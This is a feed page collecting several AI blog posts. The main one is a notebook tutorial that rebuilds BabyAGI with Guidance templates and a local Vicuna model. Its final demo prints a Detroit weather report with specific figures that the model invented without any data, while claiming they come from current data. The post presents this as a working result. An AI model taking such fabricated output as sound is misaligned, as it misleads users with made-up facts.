FreshRSS

Normální zobrazení

Jsou dostupné nové články, klikněte pro obnovení stránky.
Předevčíremjeffq, published
  • ✇jeffq, published
  • An introduction to Guidance: BabyAGI without OpenAIjeffq
    Twitter: theemozilla Jupyter Notebook: babyagi-without-openai-guidance.ipynb Guidance¶If you’re already convinced of how awesome Guidance is, you can skip this section Guidance is a new template language from Microsoft that allows you to guide the output of lanugage models. This may not sound revolutionary on the surface, but if you’ve ever tried to compose together ouputs from a LM in a non-trivial manner and spent hours re-processing the same prompt or writing tons of boilerplate
     

An introduction to Guidance: BabyAGI without OpenAI

Od: jeffq
17. Květen 2023 v 15:18

Guidance

If you’re already convinced of how awesome Guidance is, you can skip this section

Guidance is a new template language from Microsoft that allows you to guide the output of lanugage models. This may not sound revolutionary on the surface, but if you’ve ever tried to compose together ouputs from a LM in a non-trivial manner and spent hours re-processing the same prompt or writing tons of boilerplate chaining code, Guidance really can be a next-level unlock.

One of the biggest frustrations when it comes to chaining LM outputs is trying to “force” the model to generate in a specific way, for example following certain steps or in a structure that’s easily programatically interpreted. Indeed, the classic chain-of-thought prompt (i.e. “let’s think about it step-by-step”) is merely a prompting technique to guide the model to reason about the task in a desireable way. But what if we could just like… make the model do what we want? That’s where Guidance comes in.

Guidance is essentially Handlebars templates for language models, where a magic gen command invokes the model in the context of the evaluated template up to this point. As developers, we write the template structure of what we want the output of the model to be, and Guidance manages having the model “fill in the blanks”. By way of illustration, consider:

In [ ]:
from IPython.display import Image
from IPython.core.display import HTML 
Image(url="https://raw.githubusercontent.com/microsoft/guidance/main/docs/figures/json_animation.gif", width=376, height=234)
Out[ ]:

Here, the text on the white background is static, the blue background text represents variables passed in at runtime, and the green background text are the outputs generated by the language model. The Guidance code for this is:

The following is a character profile for an RPG game in JSON format.
```json
{
    "id": "{{id}}",
    "description": "{{description}}",
    "name": "{{gen 'name'}}",
    "age": {{gen 'age' pattern='[0-9]+' stop=','}},
    "armor": "{{#select 'armor'}}leather{{or}}chainmail{{or}}plate{{/select}}",
    "weapon": "{{select 'weapon' options=valid_weapons}}",
    "class": "{{gen 'class'}}",
    "mantra": "{{gen 'mantra' temperature=0.7}}",
    "strength": {{gen 'strength' pattern='[0-9]+' stop=','}},
    "items": [{{#geneach 'items' num_iterations=5 join=', '}}"{{gen 'this' temperature=0.7}}"{{/geneach}}]
}```

In Guidance we specify how we want our final text to look, using control statements such as gen to specify where the model should be used to generate specific pieces. There are tons of different control statements — in the above example we use the select statement to choose between only a few options (underneath Guidance compares the log proabilities of the options and chooses the most likely one). We can also specify regular expressions that define the valid form of an output (making strength be numeric). The Guidance repo has tons of example notebooks that show off its various capabilities. One thing I will say is that, as of this writing (May 2023) there is almost no formalized documentation as Guidance is still very much a work-in-progess. I did all of my learning by looking through the example notebooks.

Local models in Guidance

One of the best things about Guidance is its first-class support of running on local models via transformers. I would go so far as to say that in Guidance local models are strictly better than using the OpenAI API (although it does support this as well). Perhaps its greatest feature from a quality-of-life perspective when using local models is “acceleration”.

Guidance acceleration works by caching the intermediate states of the model up to the boundary points within the template. When the the template is re-evaluated, Guidance can “skip ahead” to the point where the prompt actually changes. This greatly speeds up the core write-run-evaluate core developer loop when designing templates. If you’ve ever sat there re-running the same prompt for the ten thousandth time just to get to where you’ve made a change, then acceleration is truly a life saver.

BabyAGI

BabyAGI is a proof-of-concept “AGI”. In reality, it’s a task management system that uses a vector database and instructs the language model to plan out and exceute tasks aimed at completing a specific objective (for example, “paperclip the universe”).

In [ ]:
Image(url="https://user-images.githubusercontent.com/21254008/235015461-543a897f-70cc-4b63-941a-2ae3c9172b11.png", width=496, height=367)
Out[ ]:

The reference BabyAGI code uses the OpenAI APIs. I will refrain from editorializing here, but let’s just say I’d prefer to be able to do this using open source models 🙂.

BabyAGI in Guidance

First, we need to install the prerequisites. We’ll be using transformers and accelerate to run our local models and langchain, faiss-cpu, and sentence_transformers for embeddings and vector database.

In [ ]:
!pip install transformers accelerate langchain faiss-cpu sentence_transformers ipywidgets

We’ll be using Vicuna as our language model. Vicuna has shown to be an excellent open-source competitor to GPT-3.5. It is a 13B parameter model finetuned from Llama.

Loading a 13B parameter model takes 52 GB of RAM when loaded at full precision or 26 GB at half precision. transformers has the helpful load_in_8bit parameter that reduces this to 13 GB, but unfortunately Guidance doesn’t support this yet (until PR #8 merged). I have a fork of Guidance that adds in support — install this if you want to use 8-bit quantization. Otherwise, the regular guidance package suffices.

In [ ]:
# 8-bit quantization support
!pip install git+https://github.com/jquesnelle/guidance@transformers-quantization-parameters bitsandbytes

# or, regular guidance
# !pip install guidance

Next, it’s time to load our model!

In [ ]:
import guidance

llm = guidance.llms.transformers.Vicuna(
    model="eachadea/vicuna-13b-1.1",
    device_map="auto",
    load_in_8bit=True
)

We’ll use LangChain to help us with embeddings and vector databases. The HuggingFaceEmbeddings class uses all-mpnet-base-v2 to generate embeddings, and we’ll use the simple FAISS vector database from Meta.

In [ ]:
import faiss
from langchain import InMemoryDocstore
from langchain.embeddings import HuggingFaceEmbeddings
from langchain.vectorstores import FAISS

embeddings_model = HuggingFaceEmbeddings(model_kwargs={"device": "cuda:0"})
embedding_size = 768

def make_vectorstore():
    index = faiss.IndexFlatL2(embedding_size)
    return FAISS(embeddings_model.embed_query, index, InMemoryDocstore({}), {})

Okay, let’s write some Guidance. BabyAGI has three core prompts: task execution, task creation, and task prioritization. We’ll start with the task execution prompt. The reference implementation can be found here.

In [ ]:
execution_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are an AI who performs one task based on the following objective: {{objective}}.
Take into account these previously completed tasks: {{context}}.
Your task: {{task}}.
{{~/user}}

{{#assistant~}}
{{gen 'result'}}
{{~/assistant~}}
""")

Many models are “chat” trained. That is to say, they’ve been finetuned to act as a chatbot. To get the best performance out of these models, you need to prompt them in the same way that they were trained. Unfortunately, each model has its own idiosyncrasies for this prompting. Normally, this would mean you would need different prompts for each model. However, Guidance solves this by the special #system, #user, and #assistant commands. Several popular models are supported (Vicuna, StableLM, MPT) and adding support for a new model is a simple subclass. Once supported, the same prompt can be used across different chat trained models.

In this prompt, objective, context, and task are variables we’ll pass in at runtime. We’ll generate the result variable, which will be accessible as a property of the returned object when we call execution_prompt.

In [ ]:
def get_top_tasks(vectorstore, query, k):
    results = vectorstore.similarity_search_with_score(query, k=k)
    if not results:
        return []
    sorted_results, _ = zip(*sorted(results, key=lambda x: x[1], reverse=True))
    return [str(item.page_content) for item in sorted_results]

def execute_task(vectorstore, objective, task, k=5):
    context = get_top_tasks(vectorstore=vectorstore, query=objective, k=k) \
            if vectorstore is not None else []
    return execution_prompt(objective=objective, context=context, task=task, llm=llm)["result"]
In [ ]:
sample_objective = "Write a weather report for SF today"
FIRST_TASK = "Write a todo list to complete the objective"
sample_execute_task = execute_task(vectorstore=None, objective=sample_objective, task=FIRST_TASK)
sample_execute_task
Stop program
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are an AI who performs one task based on the following objective: Write a weather report for SF today. Take into account these previously completed tasks: []. Your task: Write a todo list to complete the objective.
assistant
1. Gather current weather data for San Francisco. 2. Analyze data to determine current weather conditions in San Francisco. 3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns. 5. Organize the information in a logical and easy-to-understand format. 6. Review and edit the weather report for accuracy and clarity. 7. Present the weather report in a professional and engaging manner.
Out[ ]:
'1. Gather current weather data for San Francisco.\n2. Analyze data to determine current weather conditions in San Francisco.\n3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.\n4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.\n5. Organize the information in a logical and easy-to-understand format.\n6. Review and edit the weather report for accuracy and clarity.\n7. Present the weather report in a professional and engaging manner.'

When executing in a Jupyter notebook, Guidance automatically presents the output in an easily digestable format. We can see the seperate system, user, and assistant sections and see where runtime varabiles were inserted (blue) ana the model generated new text (green). Every variable that is created via gen is available in the result object directly — already parsed!

Next up is the task creation prompt. A large part of the reference implementation is concerned with cleaning up the response from the model, and hoping (praying) it will follow instructions regarding how to structure the output so it can be programatically iterepreted. But, this is just the task the Guidance excels at!

Our goal is to have the model take whatever the output of the previous task was and create a list of tasks to carry out the objective. This is done iteratively, so we pass in any previously incomplete tasks, and ask the model for new tasks. While we politely ask the model to output the tasks as an array, with Guidance we can actually make it happen.

In [ ]:
creation_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are a task creation AI that uses the result of an execution agent to create new tasks with the following objective: {{objective}}.
The last completed task has the result: {{result}}.
This result was based on this task description: {{task_description}}.
These are the incomplete tasks: {{incomplete_tasks}}.
Based on the result, create new tasks to be completed by the AI system that do not overlap with the incomplete tasks.
{{~/user}}

{{#assistant~}}
```json
[{{#geneach 'tasks' stop="]"}}{{#unless @first}}, {{/unless}}"{{gen 'this'}}"{{/geneach}}]
```
{{~/assistant~}}
""")

The geneach command tells Guidance to do a looped generation, creating a list of tasks. By placing geneach inside of [""] we can enforce a JSON array structure (the unless command is used to add neccessary commas).

In [ ]:
def create_tasks(result, task_description, task_list, objective):
    response = creation_prompt(
        result=result,
        task_description=task_description,
        incomplete_tasks=task_list,
        objective=objective,
        llm=llm
    )
    new_tasks = [task for task in response["tasks"] if task not in task_list]
    return [{"task_name": task_name} for task_name in new_tasks if task_name.strip()]

sample_created_tasks = create_tasks(
    result=sample_execute_task,
    task_description=FIRST_TASK,
    task_list=[],
    objective=sample_objective
)
sample_created_tasks
Stop program
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task creation AI that uses the result of an execution agent to create new tasks with the following objective: Write a weather report for SF today. The last completed task has the result: 1. Gather current weather data for San Francisco. 2. Analyze data to determine current weather conditions in San Francisco. 3. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 4. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns. 5. Organize the information in a logical and easy-to-understand format. 6. Review and edit the weather report for accuracy and clarity. 7. Present the weather report in a professional and engaging manner.. This result was based on this task description: Write a todo list to complete the objective. These are the incomplete tasks: []. Based on the result, create new tasks to be completed by the AI system that do not overlap with the incomplete tasks.
assistant
```json ["Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.", "Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.", "Organize the information in a logical and easy-to-understand format.", "Review and edit the weather report for accuracy and clarity.", "Present the weather report in a professional and engaging manner."] ```
Out[ ]:
[{'task_name': 'Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.'},
 {'task_name': 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.'},
 {'task_name': 'Organize the information in a logical and easy-to-understand format.'},
 {'task_name': 'Review and edit the weather report for accuracy and clarity.'},
 {'task_name': 'Present the weather report in a professional and engaging manner.'}]

Our tasks correctly generated and parsed! We then place these in a dictionary under the key task_name for later use in the full BabyAGI procedure.

The last prompt to write is the task prioritization prompt.

In [ ]:
prioritization_prompt = guidance("""
{{#system~}}
{{llm.default_system_prompt}}
{{~/system}}

{{#user~}}
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: {{task_names}}.
Consider the ultimate objective of your team: {{objective}}.
Do not remove any tasks. Return the result as a numbered list, like:
#. First task
#. Second task
Start the task list with number {{next_task_id}}.
{{~/user}}

{{#assistant~}}
{{#geneach 'tasks'}}{{#if (equal @index last_task_index)}}{{break}}{{/if}}{{add @index next_task_id}}. {{gen 'this' stop="\\n"}}
{{/geneach}}
{{~/assistant~}}
""")

In the task creation prompt we asked the model to output the tasks as a JSON array. Now we’ll try a harder use case: an ordered numerical list starting with some arbitrary number.

Based on experience, the model often hallucinates here and invents new tasks or repeats them. However, we want it to simply re-order the exisiting tasks. While this could be solved with a redesigned prompt or a more aligned model, we can also use the if command to control the number of tasks that can be outputted and stop after a predetermined number.

Here, we compare the special @index of the current task being generated (a magic number updated by Guidance after each loop) and break out if it’s equal to the number of tasks we know we passed in.

In [ ]:
def prioritize_tasks(this_task_id, task_list, objective):
    task_names = [t["task_name"] for t in task_list]
    next_task_id = int(this_task_id) + 1
    response = prioritization_prompt(
        task_names=task_names,
        next_task_id=next_task_id,
        objective=objective,
        last_task_index=len(task_names) - 1,
        llm=llm
    )
    return [
        {"task_id": task_id, "task_name": task_name} 
            for task_id, task_name in 
                zip(range(next_task_id, next_task_id+len(task_list)), response["tasks"])
    ]

sample_prioritized_tasks = prioritize_tasks(
    this_task_id=1,
    task_list=sample_created_tasks,
    objective=sample_objective,
)
sample_prioritized_tasks
Stop program
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: ['Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.', 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.', 'Organize the information in a logical and easy-to-understand format.', 'Review and edit the weather report for accuracy and clarity.', 'Present the weather report in a professional and engaging manner.']. Consider the ultimate objective of your team: Write a weather report for SF today. Do not remove any tasks. Return the result as a numbered list, like: #. First task #. Second task Start the task list with number 2.
assistant
2. Review and edit the weather report for accuracy and clarity. 3. Organize the information in a logical and easy-to-understand format. 4. Present the weather report in a professional and engaging manner. 5. Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed. 6. Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.
Out[ ]:
[{'task_id': 2,
  'task_name': 'Review and edit the weather report for accuracy and clarity.'},
 {'task_id': 3,
  'task_name': 'Organize the information in a logical and easy-to-understand format.'},
 {'task_id': 4,
  'task_name': 'Present the weather report in a professional and engaging manner.'},
 {'task_id': 5,
  'task_name': 'Write a clear and concise weather report for San Francisco based on the data gathered and analysis completed.'},
 {'task_id': 6,
  'task_name': 'Include any relevant information about the forecast for the rest of the day and any potential weather-related hazards or concerns.'}]

Now it’s time for the full BabyAGI procedure. It may be helpful to refer back to the diagram that shows the flow of logic, but essentially it’s our three prompts being run in succession.

In [ ]:
from collections import deque

def babyagi(objective, max_iterations=5):
    task_list = deque([{
        "task_id": 1,
        "task_name": FIRST_TASK
    }])
    task_id_counter = 1
    vectorstore = make_vectorstore()

    while max_iterations is None or max_iterations > 0:
        if task_list:

            # Step 1: Pull the first task
            task = task_list.popleft()

            # Step 2: Execute the task
            result = execute_task(
                vectorstore=vectorstore,
                objective=objective,
                task=task["task_name"]
            )
            this_task_id = int(task["task_id"])

            # Step 3: Store the result
            result_id = f"result_{task['task_id']}"
            vectorstore.add_texts(
                texts=[result],
                metadatas=[{"task": task["task_name"]}],
                ids=[result_id],
            )

            # Step 4: Create new tasks
            new_tasks = create_tasks(
                    result=result,
                    task_description=task["task_name"],
                    task_list=[t["task_name"] for t in task_list],
                    objective=objective,
                )
            for new_task in new_tasks:
                task_id_counter += 1
                new_task.update({"task_id": task_id_counter})
                task_list.append(new_task)

            # Step 5: Reprioritize task list
            task_list = deque(
                prioritize_tasks(
                    this_task_id,
                    list(task_list),
                    objective,
                )
            )
        max_iterations = None if max_iterations is None else max_iterations - 1

    return result
In [ ]:
babyagi("Write a weather report for Detroit today", max_iterations=4)
Stop program
system
A chat between a curious user and an artificial intelligence assistant. The assistant gives helpful, detailed, and polite answers to the user's questions.
user
You are a task prioritization AI tasked with cleaning the formatting of and reprioritizing the following tasks: ['Make any necessary updates to the report based on new data or changes in the weather conditions', 'Ensure the report is accurate and up-to-date', 'Evaluate the effectiveness of the written report and visual graphic in conveying the weather information to the audience', 'Analyze the gathered weather data to determine the current weather conditions', 'Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information', 'Determine the current weather conditions in Detroit', 'Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information', 'Prioritize the tasks based on their importance and urgency to achieve the ultimate objective of writing a weather report for Detroit today.', 'Execute the tasks in the order of priority.']. Consider the ultimate objective of your team: Write a weather report for Detroit today. Do not remove any tasks. Return the result as a numbered list, like: #. First task #. Second task Start the task list with number 5.
assistant
5. Prioritize the tasks based on their importance and urgency to achieve the ultimate objective of writing a weather report for Detroit today. 6. Execute the tasks in the order of priority. 7. Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information. 8. Determine the current weather conditions in Detroit. 9. Evaluate the effectiveness of the written report and visual graphic in conveying the weather information to the audience. 10. Make any necessary updates to the report based on new data or changes in the weather conditions. 11. Analyze the gathered weather data to determine the current weather conditions. 12. Ensure the report is accurate and up-to-date. 13. Write a clear and concise weather report for Detroit, including temperature, precipitation, wind speed and direction, and any other relevant information.
Out[ ]:
'Here is the weather report for Detroit:\n\nTemperature: The temperature in Detroit today is expected to reach a high of 75 degrees Fahrenheit and a low of 55 degrees Fahrenheit.\n\nPrecipitation: There is a chance of scattered thunderstorms throughout the day, with a 30% chance of precipitation.\n\nWind: The wind speed in Detroit today is expected to be light, with an average speed of 5-10 miles per hour. The wind is blowing from the southwest.\n\nOther relevant information: The humidity in Detroit today is expected to be around 60%, and the atmospheric pressure is 29.94 inches of mercury.\n\nPlease note that this weather report is based on current data and is subject to change. It is always a good idea to check the weather forecast before making any plans.\n\nIf you would like a visual graphic of the weather report, please let me know and I will be happy to provide one.'

And there you have it, BabyAGI in Guidance using only local, open source models!

Hopefully this was a helpful introduction. Likely this will quickly get outdated as Guidance is under very active development.

  • ✇jeffq, published
  • Choose Your Own Adventurejeffq
    Demo: https://cyoa.hooloovoo.ai/ Model: https://huggingface.co/emozilla/scifi-fantasy-author-7b-8k_deltaGitHub: Backend Frontend When I was a kid, the place I absolutely wanted to be was the public library that was at the end of our street. Some of my earliest memories are of sitting in the “youth” section of that library. I knew it so well I could immediately tell when they’d placed new books out, or when some furniture was re-arranged. Hell, I’m only half the programmer I am today beca
     

Choose Your Own Adventure

Od: jeffq
11. Květen 2023 v 11:44

Demo: https://cyoa.hooloovoo.ai/
Model: https://huggingface.co/emozilla/scifi-fantasy-author-7b-8k_delta

GitHub: Backend Frontend

When I was a kid, the place I absolutely wanted to be was the public library that was at the end of our street. Some of my earliest memories are of sitting in the “youth” section of that library. I knew it so well I could immediately tell when they’d placed new books out, or when some furniture was re-arranged. Hell, I’m only half the programmer I am today because, by necessity, I had to learn how to use the terminal-based inter-library book search database.

I read everything, but there was one specific section that captured my imagination like none other: the shelf devoted to the Choose Your Own Adventure book series. I checked out every one the library offered. Some were excellent, some were weird, some were — well, they were pulp kids books, what do you want? But the raw imaginative wonder they elicited is something I still remember to this day.


Part of my fascination with generative AI is in exploring how it can “unlock” the parts of our brain that, for this reason or that, are found lacking or wanting within us. I am not a great writer. Even less am I a great creative writer. However, it seems that generative AI can give me the “training wheels” to express myself.

Much handwringing has been done about AI destroying this profession or that profession. As a developer, the advances in coding AIs (e.g. codegen, StarCoder) may even threaten my profession even more than creative ones. But rather than being reactionary, I think we should look at these tools as lever-and-pullies for the mind; such tools that extended man’s ability to perform manual labor weren’t inherently unnatural or evil, but instead enabled man to become a better version of himself. The same can be true for generative AI.


Working on literAI helped me learn how to use large language models, but I came away really wanting to know how to make (or at least, augment) them. I work best when I have a defined goal or project to achieve, so a few months ago I set myself the task to re-create the Choose Your Own Adventure experiences of my youth. Here are my results!

cyoa is a mobile-friendly web app for creating your own story. It uses a finetuned version of LLaMA that I trained on a set of long-form public science fiction and fantasy stories to generate interesting and fun illustrated “books”. Trained at a context length of 8K tokens, it (seems to be) able to keep coherence of story/characters quite well over long spans, which is essential for good story telling.

Users can pick from one of two auto-generated “next steps” in the story, or alternatively write their own. What I enjoy when using the it is the ability to “jump in” and have a specific character say or do something, and then let the AI take over from there.

The core model beyond cyoa is available on my Hugging Face page as delta weights against the base LLaMA model (to comply with the LLaMA license). Summarizations of the generated choices and prompts for image generation is done using mosaicml/mpt-7b-instruct and the images themselves use DreamShaper.

The model does a good job carrying on the specific line of the story, although it sometimes struggles with major plot elements, preferring instead to keep the characters linearly progressing the established narrative. One thing that can helpful is using the “Write your own” option to add in a sudden change like the start of a new chapter (just writing “CHAPTER ONE” is enough to do this) or perspective shift.

CYOA is a novelty, but I hope it’s one that you enjoy as much as I do. Using AI to help us unlock new methods of expression within ourselves is, in my opinion, net positive for society. Enjoy 🙂.

  • ✇jeffq, published
  • Language Models vs. The SAT Reading Testjeffq
    tl;dr FLAN-T5 (11B) scored identically to GPT-3.5 (text-davinci-003) across the ten publicly available SAT Reading Tests. A finetuned 3B model scored within 7 percentage points of GPT-3.5 on held-out tests with 98% less parameters while maintaining generalization Models: base, large, xl, xxl Dataset: HuggingFace Code: GitHub After working on literAI I’ve been interested in further exploring language models from a narrative/literary perspective. One question I had was “how well do these m
     

Language Models vs. The SAT Reading Test

Od: jeffq
20. Únor 2023 v 16:32

tl;dr FLAN-T5 (11B) scored identically to GPT-3.5 (text-davinci-003) across the ten publicly available SAT Reading Tests. A finetuned 3B model scored within 7 percentage points of GPT-3.5 on held-out tests with 98% less parameters while maintaining generalization

Models: base, large, xl, xxl Dataset: HuggingFace Code: GitHub

After working on literAI I’ve been interested in further exploring language models from a narrative/literary perspective. One question I had was “how well do these models actually ‘understand’ longer prose?”

Now, it just so happens that there’s a test we make teenagers take every year to determine this very fact! That is, the SAT (specifically, the Reading part).

The SAT Reading Test, despite its name, is multimodal. There is always one section that includes a combination of charts, tables, and graphs. However, the questions are clearly delineated — typically only three questions on the test reference the data. For the purposes of evaluation I excluded these questions. First, the results.

Data

FLAN-T5 11B scored identical to GPT-3.5, despite being less than 1/10th the size! It is also can be run on a consumer GPU (<= 24 GB) when loaded in 8-bit inference mode! This offers further data supporting the hypothesis that Google did the open source local compute LM community a great service when it released FLAN-T5.


One interesting aspect of the SAT Reading Test is that 30% of the questions reference specific lines within the passage under consideration.

Which choice best supports the conclusion that
Mr. Peters wants to attract attention?

A) Lines 80-81 (“Apparently… change”)
B) Lines 81-85 (“He straightened… hand”)
C) Lines 90-91 (“The young . . . Mr. Peters”)
D) Lines 91-93 (“He was… forty-five”)

SAT Practice Test #5 Question #9

As used in line 93, “becoming” most nearly means

A) emerging.
B) fitting.
C) developing.
D) happening.

SAT Practice Test #5 Question #10

This means that to properly answer the question the LM need to be able to count lines in the presented passage and reason about them explicitly in the context of the passage itself. The dataset I created faithfully represents the line breaks as they appear on the test. What it doesn’t contain is the extra line count helper column that appears next to the passage. For example, here is a snippet of what a passage on the actual test looks like:

SAT Practice Test #5 Passage #1

Note the italicized Line and counter, which appears every five lines. Even the regular passages are multimodal! While it’s certainly just text, communicating it requires more than presenting it merely as a sequence of characters. To see how the models performed on these type of questions I took at look at how the best open source model (FLAN-T5) scored on the two question classes.

FLAN-T5 scored between 5-13% worse on the “line number” questions that it did on the other questions on the test. Could the model just need a little help counting?

To test this theory I finetuned the each of the FLAN-T5 models on eight of the ten practice tests, leaving the remaining two tests for validation. An especially huge thanks is in line to Philipp Schmid for his excellent blog posts on finetuning FLAN-T5.

The models themselves are available here: base, large, xl, xxl. Three of the four finetuned models outscored the original models, with the XL model showing the largest gain. Of particular interest is the XL model, which is within seven percentage points of GPT-3.5 while having 98% (!!!) less parameters (3B vs. 175B).

One problem with aggressive finetuning on small datasets is overfitting or loss of generalization. Do the finetuned models still perform as well as the original models on unseen tasks? To test this I ran the finetuned on a subset of the SuperGLUE metrics.

XXL PTXL FTXL PTXL FTLarge PTLarge FTBase PTBase FT
cb gpt0.870.830.830.830.760.710.820.82
copa c1/c20.950.910.950.900.830.820.570.55
rte gpt0.890.900.850.870.870.840.790.80
wic gpt0.680.680.710.720.620.610.480.48
wsc gpt0.760.770.730.750.660.610.450.46
Data

The above table represents only a few of the hundreds of metrics ran — see the data for full results. They are, however, representative; the finetuned (FT) models maintain the same generalization capabilities as the pre-trained (PT) versions! It may be that the finetuned models are (by this limited measure) “better” than the originals since they score higher on the SAT Reading Test while maintaining zero-shot unseen task performance.

In conclusion, FLAN-T5 continues to show itself as a powerful model, both in its raw reasoning capabilities relative to closed source models, but also in its ability to quickly learn new skills through finetuning — not to mention its accessibility on consumer-grade hardware. ty google

  • ✇jeffq, published
  • literAI: AI-generated open source visual podcastsjeffq
    Demo: https://literai.hooloovoo.ai/ Source: Generator, UI At my previous job I did some shader programming, and generally tinkered around with GPU workloads, and even had the chance to attend Nvidia’s GPU Technology Conference a few times. I remember in 2018 or so being surprised that more and more of the conversation in this area was being dominated by these things called “deep neural networks”. During my CS studies I was focused on cryptography, but I was curious what all this was about and
     

literAI: AI-generated open source visual podcasts

Od: jeffq
2. Únor 2023 v 14:35

Demo: https://literai.hooloovoo.ai/ Source: Generator, UI

At my previous job I did some shader programming, and generally tinkered around with GPU workloads, and even had the chance to attend Nvidia’s GPU Technology Conference a few times. I remember in 2018 or so being surprised that more and more of the conversation in this area was being dominated by these things called “deep neural networks”. During my CS studies I was focused on cryptography, but I was curious what all this was about and took an early version of Udacity’s Deep Learning Nanodegree (don’t laugh!)

The class was actually fairly insightful — making you learn about backpropagation, etc. from scratch and took you through the motions of the classic MNIST classification tasks and so forth. It ended with doing face generation using these fancy things called convolutional neural networks.

Some randomly generated faces created by a
deep convolutional generative adversarial network I made as part of my #udacity course. Not super practical, but still eminently cool

P.S. Twitter asks "Who's in these photos?" when I upload them. The dreams of electric sheep, Twitter. pic.twitter.com/Tf6iAWHEl8

— emozilla (@theemozilla) July 8, 2018
such fidelity, much wow

Neat, but still felt a bit gadget-y to me. Like every nerd I assumed that someday humanity would develop “artificial” intelligence, but at the time it didn’t seem like such a thing was imminent.

Of course, then came Stable Diffusion and ChatGPT.


When I want to learn something technical, I need to be able to thinker with it. Let me get into VS Code, get something working locally, something I can step into as deep as I want to. And then it’s just, you know, messing around with it.

this is not an exaggeration

Over the past six months I’ve been deep-diving the latest AI advancements, tinkering as I go (I recommend the excellent Neural Networks from Scratch book to get get jump started). A few projects I wrote along the way were txt2imghd and transformers-openai-api.

One pain point I kept hitting is that it seemed like the coolest stuff was all behind an API, instead of being openly accessible. Don’t get me wrong — I probably spent more money on GPU time to run open models than if I’d just paid the damn API costs, and I don’t begrudge companies trying to, you know, actually make money — but whenever I wanted to tinker the best stuff required carefully rate limited API calls. I wanna do dumb shit in a tight for loop without the fear of a gazillion dollar bill!


One night while perusing the latest arXiv posts I came across SODA: Million-scale Dialogue Distillation with Social Commonsense Contextualization, which used research into knowledge graphs to generate prompts for text-davinci-003 (the model behind ChatGPT) to create a large dataset of synthetic dialogues along with the accompanying semantic information (e.g. the intent of one of the speakers). This dataset was then used to fine-tune the open source T5 language model from Google to create COSMO, a model that can generate realistic sounding human dialogues.

I spend a fair amount of time listening to audiobooks and podcasts, and this got me thinking about potential applications. Could a podcast about a novel be generated by a model like COSMO? (As part of my research I contributed some SODA data into Open Assistant, a project to create an open source ChatGPT). Furthermore, could it be done using consumer-grade hardware, i.e. not on an A100?

Lo and behold, yacine had similar inklings and while I was working on my project released scribepod, powered by the 900-pound-gorilla that is text-davinci-003. This was partial vindication — yes, it could be done — but also somewhat deflating since it meant it would need to be tethered to an API.

Or must it be? COSMO can make the dialogue — but it needs some information on what to say. The critical task here is summarization; taking the raw novel text and distilling it into meaningful pieces that can be used as context when prompting the dialogue generating LM. Peter Szemraj has been doing fantastic open source work in this space, and I decided to use his long-t5-tglobal-xl-16384-book-summary model (again a fine-tuning of T5 — are we noticing a pattern here? Thanks Google!!!)

Okay, so I had an open source way to summarize text and generate dialogue. How about a bit of flair? Given the incredible results that diffusion models have had in image generation, I wanted to leverage these to give the podcast some imagery. My idea was a player for the podcast that would scroll between images generated from descriptions of the scene that the podcast participants were talking about. To do this, I needed to automatically generate prompts to Stable Diffusion models (Greg Rutkowski here we come).

The ChatGPT-solves-everything answer is to simply few-shot it with some examples of what you’d like using something like LangChain and let those 125 billion parameters work their magic. To maintain our open source purity I chose FLAN-T5 (paper; model), the instruction-tuned version of T5. FLAN-T5 produced very good, although admittedly inferior, results. Alas, such is the price we must pay (or not pay in this case).

Once the image descriptions were created it was simply the matter of generating a prompt and letting a Stable Diffusion model like Dreamlike Diffusion do the rest!

Images generated for H. G. Wells’ “The War of the Worlds”

The final piece was to make actual audio. I cribbed yacine’s use of TorToiSe, and at last the amalgamation was complete — literAI was born! You can try out the visual player here.


I’ll save my poetic waxing about AI for another time. Rather, I’d like to simply appreciate the work of the countless researchers who contributed to getting us to the current SOTA. It’s frankly bewildering. I’m looking forward to where we’re going — and being a builder of it along the way.

  • ✇jeffq, published
  • On the linkability of Zcash transactionsjeffq
    Today I’m publishing a paper (PDF, arXiv) I wrote about the linkability of certain types of Zcash transactions. I’m also publishing a list of round-trip transactions generated as part of the research. The code used is up on GitHub (parser, database generator). If you don’t feel like reading the whole thing, there’s a summary below! Note: A draft of the paper was shared with the Zcash Company before publishing. They have published a blog regarding the results. As you probably know, Bitcoin is a
     

On the linkability of Zcash transactions

Od: jeffq
4. Prosinec 2017 v 22:31

Today I’m publishing a paper (PDF, arXiv) I wrote about the linkability of certain types of Zcash transactions. I’m also publishing a list of round-trip transactions generated as part of the research. The code used is up on GitHub (parser, database generator). If you don’t feel like reading the whole thing, there’s a summary below!

Note: A draft of the paper was shared with the Zcash Company before publishing. They have published a blog regarding the results.


As you probably know, Bitcoin is a “transparent ledger”, which means that it is very simple (and in fact, essential to verifying its correctness) to trace the flow of coins from one address to another. In this way, the transactions are “linkable”. Zcash is a fork of Bitcoin that adds in a new type of address called shielded addresses or a “z-addrs”. Transactions involving z-addrs use a special type of cryptography (zk-SNARKs) to obscure the parties and amounts of transactions.

